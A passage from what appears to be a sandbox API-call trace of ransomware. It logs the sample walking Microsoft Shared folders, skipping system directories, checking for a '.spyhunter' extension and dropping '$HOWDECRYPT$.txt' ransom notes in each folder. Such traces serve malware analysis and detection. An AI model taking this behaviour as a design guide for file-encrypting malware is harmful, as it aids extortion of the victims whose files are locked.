lpSrch=".spyhunter") returned 0x0 [0091.476] lstrcmpW (lpString1="WHGTXT.SHX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.476] lstrcmpW (lpString1="WHGTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0091.476] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX") returned 80 [0091.476] GetProcessHeap () returned 0x2c0000 [0091.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f058 [0091.477] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1510) returned 0x3824f8 [0091.479] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.479] lstrcmpiW (lpString1="WHTGTXT.SHX", lpString2="Windows") returned -1 [0091.479] lstrlenW (lpString="Windows") returned 7 [0091.479] lstrcmpiW (lpString1="WHTGTXT.SHX", lpString2="$Recycle.bin") returned 1 [0091.479] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.479] lstrcmpiW (lpString1="WHTGTXT.SHX", lpString2="System Volume Information") returned 1 [0091.479] lstrlenW (lpString="System Volume Information") returned 25 [0091.479] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX") returned 81 [0091.479] StrStrIW (lpFirst="WHTGTXT.SHX", lpSrch=".spyhunter") returned 0x0 [0091.479] lstrcmpW (lpString1="WHTGTXT.SHX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.479] lstrcmpW (lpString1="WHTGTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0091.479] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX") returned 81 [0091.479] GetProcessHeap () returned 0x2c0000 [0091.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f148 [0091.479] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1518) returned 0x3824f8 [0091.479] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.479] lstrcmpiW (lpString1="WHTMTXT.SHX", lpString2="Windows") returned -1 [0091.479] lstrlenW (lpString="Windows") returned 7 [0091.480] lstrcmpiW (lpString1="WHTMTXT.SHX", lpString2="$Recycle.bin") returned 1 [0091.480] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.480] lstrcmpiW (lpString1="WHTMTXT.SHX", lpString2="System Volume Information") returned 1 [0091.480] lstrlenW (lpString="System Volume Information") returned 25 [0091.480] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX") returned 81 [0091.480] StrStrIW (lpFirst="WHTMTXT.SHX", lpSrch=".spyhunter") returned 0x0 [0091.480] lstrcmpW (lpString1="WHTMTXT.SHX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.480] lstrcmpW (lpString1="WHTMTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0091.480] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX") returned 81 [0091.480] GetProcessHeap () returned 0x2c0000 [0091.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f238 [0091.480] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1520) returned 0x3824f8 [0091.480] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.480] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.486] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\$HOWDECRYPT$.txt") returned 86 [0091.486] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\$HOWDECRYPT$.txt") returned 86 [0091.487] GetProcessHeap () returned 0x2c0000 [0091.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x3553b0 [0091.487] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1520) returned 0x3824f8 [0091.487] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.487] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.487] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\$HOWDECRYPT$.txt") returned 80 [0091.487] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\$HOWDECRYPT$.txt") returned 80 [0091.487] GetProcessHeap () returned 0x2c0000 [0091.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f328 [0091.487] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1528) returned 0x3824f8 [0091.488] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.488] lstrcmpiW (lpString1="VSTO", lpString2="Windows") returned -1 [0091.488] lstrlenW (lpString="Windows") returned 7 [0091.488] lstrcmpiW (lpString1="VSTO", lpString2="$Recycle.bin") returned 1 [0091.488] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.488] lstrcmpiW (lpString1="VSTO", lpString2="System Volume Information") returned 1 [0091.488] lstrlenW (lpString="System Volume Information") returned 25 [0091.488] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO") returned 55 [0091.488] lstrcmpW (lpString1="VSTO", lpString2=".") returned 1 [0091.488] lstrcmpW (lpString1="VSTO", lpString2="..") returned 1 [0091.489] GetProcessHeap () returned 0x2c0000 [0091.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.489] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*") returned 57 [0091.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.517] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.517] lstrlenW (lpString="Windows") returned 7 [0091.518] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.518] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.518] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.518] lstrlenW (lpString="System Volume Information") returned 25 [0091.518] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\.") returned 57 [0091.518] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.518] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.518] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.518] lstrlenW (lpString="Windows") returned 7 [0091.518] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.518] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.518] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.518] lstrlenW (lpString="System Volume Information") returned 25 [0091.518] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\..") returned 58 [0091.518] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.518] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.518] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.518] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0091.518] lstrlenW (lpString="Windows") returned 7 [0091.518] lstrcmpiW (lpString1="10.0", lpString2="$Recycle.bin") returned 1 [0091.518] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.518] lstrcmpiW (lpString1="10.0", lpString2="System Volume Information") returned -1 [0091.518] lstrlenW (lpString="System Volume Information") returned 25 [0091.518] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0") returned 60 [0091.518] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0091.519] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0091.519] GetProcessHeap () returned 0x2c0000 [0091.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c12890 [0091.519] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*") returned 62 [0091.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.582] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.582] lstrlenW (lpString="Windows") returned 7 [0091.582] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.582] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.582] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.582] lstrlenW (lpString="System Volume Information") returned 25 [0091.582] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\.") returned 62 [0091.582] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.583] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.583] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.583] lstrlenW (lpString="Windows") returned 7 [0091.583] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.583] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.583] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.583] lstrlenW (lpString="System Volume Information") returned 25 [0091.583] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\..") returned 63 [0091.583] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.583] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.583] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.583] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0091.583] lstrlenW (lpString="Windows") returned 7 [0091.583] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0091.583] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.583] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0091.583] lstrlenW (lpString="System Volume Information") returned 25 [0091.583] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033") returned 65 [0091.583] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0091.583] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0091.583] GetProcessHeap () returned 0x2c0000 [0091.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c228d8 [0091.584] wnsprintfW (in: pszDest=0x2c228d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*") returned 67 [0091.584] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0091.590] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.590] lstrlenW (lpString="Windows") returned 7 [0091.590] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.590] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.590] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.590] lstrlenW (lpString="System Volume Information") returned 25 [0091.590] wnsprintfW (in: pszDest=0x2c228d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\.") returned 67 [0091.590] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.590] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.590] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.591] lstrlenW (lpString="Windows") returned 7 [0091.591] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.591] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.591] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.591] lstrlenW (lpString="System Volume Information") returned 25 [0091.591] wnsprintfW (in: pszDest=0x2c228d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\..") returned 68 [0091.591] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.591] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.591] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.592] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="Windows") returned -1 [0091.592] lstrlenW (lpString="Windows") returned 7 [0091.592] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="$Recycle.bin") returned 1 [0091.592] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.592] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="System Volume Information") returned 1 [0091.592] lstrlenW (lpString="System Volume Information") returned 25 [0091.592] wnsprintfW (in: pszDest=0x2c228d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 85 [0091.592] StrStrIW (lpFirst="VSTOInstallerUI.dll", lpSrch=".spyhunter") returned 0x0 [0091.592] lstrcmpW (lpString1="VSTOInstallerUI.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.592] lstrcmpW (lpString1="VSTOInstallerUI.dll", lpString2="_uninstalling_.png") returned 1 [0091.592] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 85 [0091.592] GetProcessHeap () returned 0x2c0000 [0091.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3553b0 [0091.592] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1510) returned 0x3824f8 [0091.592] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.592] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="Windows") returned -1 [0091.592] lstrlenW (lpString="Windows") returned 7 [0091.592] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="$Recycle.bin") returned 1 [0091.592] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.592] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="System Volume Information") returned 1 [0091.592] lstrlenW (lpString="System Volume Information") returned 25 [0091.592] wnsprintfW (in: pszDest=0x2c228d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 82 [0091.592] StrStrIW (lpFirst="VSTOLoaderUI.dll", lpSrch=".spyhunter") returned 0x0 [0091.592] lstrcmpW (lpString1="VSTOLoaderUI.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.593] lstrcmpW (lpString1="VSTOLoaderUI.dll", lpString2="_uninstalling_.png") returned 1 [0091.593] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 82 [0091.593] GetProcessHeap () returned 0x2c0000 [0091.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f328 [0091.593] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1518) returned 0x3824f8 [0091.593] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0091.593] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0091.593] wnsprintfW (in: pszDest=0x2c228d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\$HOWDECRYPT$.txt") returned 82 [0091.593] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\$HOWDECRYPT$.txt") returned 82 [0091.593] GetProcessHeap () returned 0x2c0000 [0091.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f418 [0091.593] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1520) returned 0x3824f8 [0091.593] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.593] lstrcmpiW (lpString1="VSTOInstaller.config", lpString2="Windows") returned -1 [0091.593] lstrlenW (lpString="Windows") returned 7 [0091.593] lstrcmpiW (lpString1="VSTOInstaller.config", lpString2="$Recycle.bin") returned 1 [0091.593] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.593] lstrcmpiW (lpString1="VSTOInstaller.config", lpString2="System Volume Information") returned 1 [0091.593] lstrlenW (lpString="System Volume Information") returned 25 [0091.593] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 81 [0091.594] StrStrIW (lpFirst="VSTOInstaller.config", lpSrch=".spyhunter") returned 0x0 [0091.594] lstrcmpW (lpString1="VSTOInstaller.config", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.595] lstrcmpW (lpString1="VSTOInstaller.config", lpString2="_uninstalling_.png") returned 1 [0091.606] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 81 [0091.606] GetProcessHeap () returned 0x2c0000 [0091.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f148 [0091.606] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1518) returned 0x3824f8 [0091.606] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.606] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="Windows") returned -1 [0091.606] lstrlenW (lpString="Windows") returned 7 [0091.606] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="$Recycle.bin") returned 1 [0091.606] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.606] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="System Volume Information") returned 1 [0091.606] lstrlenW (lpString="System Volume Information") returned 25 [0091.606] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 78 [0091.606] StrStrIW (lpFirst="VSTOInstaller.exe", lpSrch=".spyhunter") returned 0x0 [0091.606] lstrcmpW (lpString1="VSTOInstaller.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.607] lstrcmpW (lpString1="VSTOInstaller.exe", lpString2="_uninstalling_.png") returned 1 [0091.607] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 78 [0091.607] GetProcessHeap () returned 0x2c0000 [0091.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x377f08 [0091.607] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1520) returned 0x3824f8 [0091.607] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.607] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="Windows") returned -1 [0091.607] lstrlenW (lpString="Windows") returned 7 [0091.607] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="$Recycle.bin") returned 1 [0091.607] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.607] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="System Volume Information") returned 1 [0091.607] lstrlenW (lpString="System Volume Information") returned 25 [0091.607] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll") returned 75 [0091.607] StrStrIW (lpFirst="VSTOLoader.dll", lpSrch=".spyhunter") returned 0x0 [0091.607] lstrcmpW (lpString1="VSTOLoader.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.607] lstrcmpW (lpString1="VSTOLoader.dll", lpString2="_uninstalling_.png") returned 1 [0091.607] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll") returned 75 [0091.607] GetProcessHeap () returned 0x2c0000 [0091.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346b88 [0091.607] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1528) returned 0x3824f8 [0091.607] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.607] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="Windows") returned -1 [0091.607] lstrlenW (lpString="Windows") returned 7 [0091.607] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="$Recycle.bin") returned 1 [0091.608] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.608] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="System Volume Information") returned 1 [0091.608] lstrlenW (lpString="System Volume Information") returned 25 [0091.608] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 84 [0091.608] StrStrIW (lpFirst="VSTOMessageProvider.dll", lpSrch=".spyhunter") returned 0x0 [0091.608] lstrcmpW (lpString1="VSTOMessageProvider.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.608] lstrcmpW (lpString1="VSTOMessageProvider.dll", lpString2="_uninstalling_.png") returned 1 [0091.608] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 84 [0091.608] GetProcessHeap () returned 0x2c0000 [0091.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x3554a8 [0091.608] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1530) returned 0x3824f8 [0091.608] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.608] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.608] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\$HOWDECRYPT$.txt") returned 77 [0091.608] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\$HOWDECRYPT$.txt") returned 77 [0091.608] GetProcessHeap () returned 0x2c0000 [0091.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377ff0 [0091.609] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1538) returned 0x3824f8 [0091.609] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.609] lstrcmpiW (lpString1="vstoee.dll", lpString2="Windows") returned -1 [0091.609] lstrlenW (lpString="Windows") returned 7 [0091.609] lstrcmpiW (lpString1="vstoee.dll", lpString2="$Recycle.bin") returned 1 [0091.609] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.609] lstrcmpiW (lpString1="vstoee.dll", lpString2="System Volume Information") returned 1 [0091.609] lstrlenW (lpString="System Volume Information") returned 25 [0091.609] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll") returned 66 [0091.609] StrStrIW (lpFirst="vstoee.dll", lpSrch=".spyhunter") returned 0x0 [0091.609] lstrcmpW (lpString1="vstoee.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.609] lstrcmpW (lpString1="vstoee.dll", lpString2="_uninstalling_.png") returned 1 [0091.609] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll") returned 66 [0091.609] GetProcessHeap () returned 0x2c0000 [0091.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x358060 [0091.609] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1540) returned 0x3824f8 [0091.609] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.610] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="Windows") returned -1 [0091.610] lstrlenW (lpString="Windows") returned 7 [0091.610] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="$Recycle.bin") returned 1 [0091.610] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.610] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="System Volume Information") returned 1 [0091.610] lstrlenW (lpString="System Volume Information") returned 25 [0091.610] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb") returned 69 [0091.610] StrStrIW (lpFirst="vstoee100.tlb", lpSrch=".spyhunter") returned 0x0 [0091.610] lstrcmpW (lpString1="vstoee100.tlb", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.610] lstrcmpW (lpString1="vstoee100.tlb", lpString2="_uninstalling_.png") returned 1 [0091.610] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb") returned 69 [0091.610] GetProcessHeap () returned 0x2c0000 [0091.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e128 [0091.610] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1548) returned 0x3824f8 [0091.610] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.610] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="Windows") returned -1 [0091.610] lstrlenW (lpString="Windows") returned 7 [0091.610] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="$Recycle.bin") returned 1 [0091.610] 